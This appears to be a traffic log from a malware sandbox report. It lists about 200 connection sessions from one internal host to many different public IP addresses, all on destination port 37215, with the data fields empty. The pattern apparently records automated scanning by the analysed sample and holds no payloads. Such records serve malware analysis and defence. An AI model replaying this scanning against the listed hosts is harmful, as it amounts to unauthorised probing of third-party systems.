                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19155192.168.2.1550600156.41.119.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19156192.168.2.1551908156.187.245.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19157192.168.2.1538828156.241.141.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19158192.168.2.1536546156.158.110.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19159192.168.2.1544488156.45.248.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19160192.168.2.1556366156.252.239.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19161192.168.2.1533140156.23.80.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19162192.168.2.1536666156.5.246.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19163192.168.2.1543070156.79.157.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19164192.168.2.1549002197.106.177.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19165192.168.2.1544602156.188.67.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19166192.168.2.1547506197.245.188.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19167192.168.2.1557388197.114.248.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19168192.168.2.1558296197.54.94.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19169192.168.2.1553488197.81.95.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19170192.168.2.1558232197.149.149.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19171192.168.2.1547708197.162.120.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19172192.168.2.1538510197.155.97.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19173192.168.2.1533716197.32.130.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19174192.168.2.1557522197.146.22.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19175192.168.2.1560228197.214.144.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19176192.168.2.1538548197.102.210.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19177192.168.2.1538258197.192.125.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19178192.168.2.1556060197.182.233.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19179192.168.2.1543032197.10.88.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19180192.168.2.1545490197.142.169.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19181192.168.2.1551250197.162.239.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19182192.168.2.1557004197.43.224.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19183192.168.2.1544986197.254.226.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19184192.168.2.1558624197.210.5.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19185192.168.2.1533764197.156.124.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19186192.168.2.1548532197.97.29.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19187192.168.2.1538274197.117.99.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19188192.168.2.1540782197.37.139.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19189192.168.2.1553440197.15.248.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19190192.168.2.1537256197.110.191.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19191192.168.2.1535190197.245.173.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19192192.168.2.1553744197.224.178.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19193192.168.2.1550356197.128.251.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19194192.168.2.1543422197.88.36.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19195192.168.2.1534710197.224.201.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19196192.168.2.1543096197.109.213.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19197192.168.2.1556576197.159.50.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19198192.168.2.1551514197.117.56.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19199192.168.2.1550866197.212.183.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19200192.168.2.1558624197.97.153.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19201192.168.2.1559894197.82.166.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19202192.168.2.1534374197.253.162.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19203192.168.2.1538562197.212.9.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19204192.168.2.1533226197.31.242.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19205192.168.2.1552434197.184.221.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19206192.168.2.1554428197.72.68.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19207192.168.2.1556788197.131.250.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19208192.168.2.1553540197.218.179.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19209192.168.2.1538226197.104.141.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19210192.168.2.1553642197.185.151.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19211192.168.2.1533070197.222.136.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19212192.168.2.1544436197.232.154.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19213192.168.2.1552842197.159.140.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19214192.168.2.1549516197.104.189.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19215192.168.2.1541080197.23.77.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19216192.168.2.1539660197.181.52.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19217192.168.2.1543098197.128.77.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19218192.168.2.1560166197.141.89.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19219192.168.2.1553842197.44.152.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19220192.168.2.1555482197.102.171.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19221192.168.2.1533172197.170.79.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19222192.168.2.1545360197.247.244.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19223192.168.2.1551632197.12.135.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19224192.168.2.1557618197.33.173.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19225192.168.2.1544530197.143.125.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19226192.168.2.1553680197.212.142.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19227192.168.2.1550090197.61.34.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19228192.168.2.1541712197.118.51.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19229192.168.2.1544118197.70.86.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19230192.168.2.1535782197.53.37.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19231192.168.2.1533090197.161.22.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19232192.168.2.1556876197.204.22.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19233192.168.2.1544324197.244.167.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19234192.168.2.1553700197.39.237.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19235192.168.2.1545384197.3.233.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19236192.168.2.1543388197.74.214.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19237192.168.2.1539168197.127.197.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19238192.168.2.1560082197.182.254.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19239192.168.2.1537434197.3.117.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19240192.168.2.1540864197.3.255.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19241192.168.2.1550840197.42.101.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19242192.168.2.1550206197.192.58.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19243192.168.2.1552246197.195.185.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19244192.168.2.1541058197.178.171.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19245192.168.2.1541456197.174.107.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19246192.168.2.1535212197.176.44.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19247192.168.2.1540122197.229.94.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19248192.168.2.1551440197.239.117.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19249192.168.2.1539464197.129.255.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19250192.168.2.1542330197.198.131.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19251192.168.2.1549626197.162.81.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19252192.168.2.1543140197.148.136.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19253192.168.2.1553732197.82.13.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19254192.168.2.1547040197.130.186.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19255192.168.2.1539800197.5.127.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19256192.168.2.1550186197.164.113.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19257192.168.2.1555336197.206.197.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19258192.168.2.1552612197.99.78.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19259192.168.2.1550660197.221.79.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19260192.168.2.1533812197.122.56.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19261192.168.2.1548550197.99.125.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19262192.168.2.1544320197.112.62.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19263192.168.2.1560074197.209.95.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19264192.168.2.1533726197.169.222.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19265192.168.2.1544192197.32.3.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19266192.168.2.1544658197.176.216.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19267192.168.2.1552742197.116.192.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19268192.168.2.1536030197.34.17.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19269192.168.2.1559710197.154.44.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19270192.168.2.1537588197.46.56.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19271192.168.2.1549390197.200.176.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19272192.168.2.1560212197.100.7.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19273192.168.2.1542522197.58.185.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19274192.168.2.1554156197.235.167.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19275192.168.2.1558296197.187.134.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19276192.168.2.1538032197.49.117.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19277192.168.2.1539532197.245.60.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19278192.168.2.1548286197.96.132.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19279192.168.2.1539700197.251.21.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19280192.168.2.1536048197.191.120.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19281192.168.2.1539582197.16.203.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19282192.168.2.1541490197.168.155.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19283192.168.2.1553238197.145.252.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19284192.168.2.1537612197.170.170.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19285192.168.2.1560154197.52.131.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19286192.168.2.1538276197.43.230.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19287192.168.2.1537958197.194.204.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19288192.168.2.1536224197.238.187.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19289192.168.2.1549110197.43.140.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19290192.168.2.1538114197.166.128.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19291192.168.2.1547936197.249.88.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19292192.168.2.1541760197.240.116.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19293192.168.2.1549328197.34.189.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19294192.168.2.1549456197.148.168.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19295192.168.2.1549642197.102.245.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19296192.168.2.1544536197.73.123.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19297192.168.2.1560110197.140.7.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19298192.168.2.1554072197.149.217.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19299192.168.2.1553172197.10.46.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19300192.168.2.1536462197.217.182.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19301192.168.2.1541582197.130.233.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19302192.168.2.1558858197.36.17.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19303192.168.2.1536278197.18.47.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19304192.168.2.1547698197.178.231.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19305192.168.2.1550750197.254.197.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19306192.168.2.1535380197.18.96.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19307192.168.2.1544814197.203.251.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19308192.168.2.1537216197.120.153.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19309192.168.2.1548978197.22.50.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19310192.168.2.1538920197.124.252.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19311192.168.2.1551256197.240.233.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19312192.168.2.1542788197.178.32.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19313192.168.2.1533898197.175.172.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19314192.168.2.1541154197.221.34.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19315192.168.2.1539262197.81.51.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19316192.168.2.1547490197.65.189.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19317192.168.2.1543994197.190.137.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19318192.168.2.1558326197.58.175.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19319192.168.2.1542610197.38.187.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19320192.168.2.1543664197.119.114.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19321192.168.2.1553648197.26.61.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19322192.168.2.1554056197.45.17.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19323192.168.2.1548150197.222.43.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19324192.168.2.1558606197.125.125.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19325192.168.2.1533926197.238.165.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19326192.168.2.1556372197.55.84.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19327192.168.2.1551320197.140.156.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19328192.168.2.1560554197.96.184.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19329192.168.2.1554888197.31.119.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19330192.168.2.1557872197.165.140.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19331192.168.2.1537444197.203.215.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19332192.168.2.1538920197.156.179.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19333192.168.2.1543618197.180.190.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19334192.168.2.1550622197.148.172.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19335192.168.2.1540050197.213.109.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19336192.168.2.1548904197.216.231.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19337192.168.2.1540298197.107.203.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19338192.168.2.1546502197.228.29.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19339192.168.2.1536218197.188.195.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19340192.168.2.1543088197.58.134.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19341192.168.2.1537126197.94.50.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19342192.168.2.1554808197.124.92.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19343192.168.2.1555352197.200.160.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19344192.168.2.1552700197.240.223.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19345192.168.2.1552172197.214.66.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19346192.168.2.1541704197.4.159.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19347192.168.2.1552046197.133.81.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19348192.168.2.1557666197.116.130.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19349192.168.2.1547784197.104.72.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19350192.168.2.1533608197.49.109.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19351192.168.2.1546264197.31.76.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19352192.168.2.1553672197.122.171.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19353192.168.2.1534204197.29.45.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19354192.168.2.1556218197.218.158.19437215
                                                                            TimestampBytes transferredDirectionData


